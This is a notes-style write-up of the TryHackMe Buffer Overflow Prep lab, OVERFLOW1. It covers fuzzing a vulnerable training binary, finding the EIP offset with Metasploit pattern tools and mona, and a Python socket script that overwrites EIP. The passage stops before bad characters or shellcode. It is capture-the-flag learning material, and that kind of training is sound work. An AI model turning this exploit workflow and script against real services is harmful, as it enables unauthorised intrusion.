Buffer Overflow Prep — OverFlow1- TryHackMe

0xsanz
5 min readSep 29, 2020

This is a write-up for Buffer Overflow Prep room by Tib3rius on Try Hack Me in notes style format.

Useful Links
=======

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
https://tryhackme.com/room/bufferoverflowprep

Fuzzing with long input Strings
==================
⇒ python3 -c ‘print (“A” * 5000)’ ⇒ Generate lots of As
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A’s to target : OVERFLOW1 AAAA….5000 times
⇒ OSCP.exe crashes indicated we can exploit this using Buffer Overflow.

MSF Pattern create
===========
⇒ msf-pattern_create -l 5000
⇒ send over to the target exe via nc session only.

Mona Config
========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity

Finding Offset
========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.

⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP

Offset is at 1978.

⇒ Fuzz again with 1978 A’s and 4 B’s
* python3 -c ‘print (“A” * 1978 + “B” * 4)’

  • So we see EIP is filled with four B’s. We found the exact sweet spot.

⇒ Python 3 script to test the same:

import socketimport sys
message = b"OVERFLOW1 " #Notice the space in the end
payload = message + b"A" * 1978 + b"B" * 4

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()

Finding Bad Characters
=============
⇒ !mona bytearray -b “\x00” ⇒ Run this in Immunity to generate…

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900,AZ204